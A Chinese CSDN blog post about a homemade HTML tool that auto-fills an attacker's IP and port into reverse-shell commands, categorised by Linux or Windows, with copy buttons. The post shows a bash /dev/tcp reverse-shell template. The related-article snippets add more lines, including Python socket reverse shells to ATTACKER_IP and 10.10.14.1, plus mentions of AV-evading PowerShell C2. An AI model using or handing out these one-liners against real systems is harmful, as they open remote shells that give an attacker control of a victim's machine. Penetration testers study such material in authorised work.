windows 反弹shell_HTML单文件小工具反弹shell备忘录

最新推荐文章于 2023-03-07 16:12:20 发布
最新推荐文章于 2023-03-07 16:12:20 发布
阅读量167 收藏
点赞数
文章标签: windows 反弹shell

0x00 前言

好久不见

0x01 工具介绍

起因是, 每次需要弹shell的时候都要去翻笔记, 或者找一些编码网站编码payload, 改完IP再复制还总是容易出错...

于是写了下面这个HTML单文件版的小工具, 如下

3496585d40f306789e839f582a40ecbf.png

PS: 懒的美化了(其实是不会)

事件功能一:

在LHOST与LPORT输入IP及端口, 点击确认后会被自动填充到各个反弹shell语句当中, 告别手动修改

43556b0f16ab7f8a591a47839c9ba8be.png

事件功能二:

给反弹shell语句用复选框做了分类, 遇到linux选linux, 遇到windows选windows..., 告别眼花缭乱

fd53bf8687985e33074beeae6114a72e.png

事件功能三:

每个语句后面都有一个按钮, 点击即可复制, 告别按着鼠标左键不松

4e33a779bfd02b109a5687128b3b9c44.png

事件功能四:

加了提示语句属性, 鼠标停留在反弹shell语句上即可查看提示, 告别...
嗯...这个不知道告别啥, 那就提前祝兄弟姐妹们新年快乐吧

57f28c5e4685d61da234dc67b4fe92eb.png

0x02 如何自定义

最开始是使用html写死的, 发现语句扩展起来全是重复的标签代码, 也比较繁琐, 于是用js重写了一个版本

d9b8ad87497b765eae65aa917bd6d367.png

如上图, 你可以加入自己常用的payload语句,如

["linux", `bash -i >& /dev/tcp/127.0.0.1/4444 0>&1`, "这里可以写提示语句"]

将IP用${lhost.value}替换掉, 端口用${lport.value}替换掉, 变为:

["linux", `bash -i >& /dev/tcp/${lhost.value}/${lport.value} 0>&1`, "这里可以写提示语句"],

如果你很熟悉这个语句, 提示文本忽略不写即可, 如下:

["linux", `bash -i >& /dev/tcp/${lhost.value}/${lport.value} 0>&1`],

如果你需要新建一个分类, 举例先添加一个语句如下:

["abc123", `xxx xxx`, "这是一个新的分类"],

11a5ab082369d68718e382c3e494ee6c.png

在这个位置加入一组新的及标签, 标记位置改为 abc123 与之统一即可

for="abc123">abc123: label><input id="abc123" type="checkbox" name="payload_type" onclick="choose()" checked="true">

36b368b2f0916a5d481372e49bd2a476.png

0x03 结束语

js事件都已经写好了, 反弹shell语句自己添加即可(实际中我自己用的语句也并不多)

后台回复: 20201203 即可获取工具文件

0x04 参考文章

https://forum.ywhack.com/shell.php

https://mp.weixin.qq.com/s/uXnPctlOBmciHM4Q-7oquw

说明: 文章不保证内容完全准确, 文中如有错误还请多多指出, 共同进步.

f8ec6d20c9b24a7722acfb15fad90aec.png

weixin_39560002
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹shell工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
linux反弹shell方法
weixin_53747497的博客
07-12 1693
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4756
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2306
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
各种反弹shell一键生成网站
技术超强的网络安全平台
12-01 3399
请使用: https://forum.ywhack.com/shell.php
kali之vulnhub,hardsocnet2
weixin_54431413的博客
05-15 969
一、利用最近公布的ubuntu 8.4 内核提权漏洞来进行了提取,简便的得到了服务器root权限。 二、利用缓冲区溢出来执行admin留下的backdoor来获得root权限,涉及gdb调试,汇编语言等
shell_lover:反向外壳备忘工具
03-18
shell_lover 该工具是反向外壳备忘,可根据您的需要为您定制外壳 用法
windows-adb-driver-for-Spreadtrum.rar_ADB Shell_adb 工具包_android_
07-14
第一步:驱动文件及adb工具包均已嵌入到文档中,在相应位至鼠标右键“保存到文件”就可以解压安装了,安装完毕就能使用了 第二步:如果adb已经运行过,那就adb kill-server,再重新adb shell,最后一步很重要,那就是...
ShellExtGuide2_demo.zip_DEMO_shell_shell编程_windows shell
09-23
shell 编程的例子2
PHP后台循环锁定文件.zip_PHP后台循环_php文件锁定_shell_锁定
09-20
驻留在内存中在后台循环执行文件内容锁定,保护你的shell内的文件不被同行删除或者修改
shell 工具_ReverseTCPShell C2 反弹shell工具
weixin_39520880的博客
11-26 141
ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。测试:1. 在文件目录下启动powershell2. .ReverseTCP.ps1 ,启动程序会出现这个界面,功能介绍,设置好lhost和lport(监听地址及端口)Modules (模块) | - Show C2-Server Mo...
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 7739
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
vulnhub之hacksudo:Thor
weixin_54431413的博客
05-24 531
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
利用js文件反弹shell
ST0new的博客
07-07 1663
前言 本篇文章是按照大佬的文章复现 公众号: 洛米唯熊 环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 工具地址 https://github.com/CroweCybersecurity/ps1encode 克隆 在kali克隆工具 命令:git clone https://github.com/Cr...
基于JavaScript的rce反弹shell漏洞
qq_41679358的博客
08-17 3236
本文转自行云博客https://www.xy586.top/ 文章目录环境要求工具地址攻击步骤 环境要求 kali攻击机 192.168.232.131 win10靶机 192.168.232.140 工具地址 https://github.com/CroweCybersecurity/ps1encode 攻击步骤 拉取工具到kali的根目录下 git clone https://github.com/CroweCybersecurity/ps1encode.git 给权限 chmod +x pslen.
Web渗透中的反弹Shell与端口转发的奇淫技巧
大方子
10-02 9515
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i &gt;&amp; /dev/tcp/x.x.x.x/2333 0&g...
webshel反弹shell
公众号shadow sock7
10-21 648
只需要使用burp的decoder功能,将命令url编码一下就可以了。 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s....
10种反弹shell方式
kevinhanser
03-30 4848
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
反弹shell脚本
Soul Blog
11-23 3150
反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
windows 反弹shell
最新发布
07-29
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell的攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值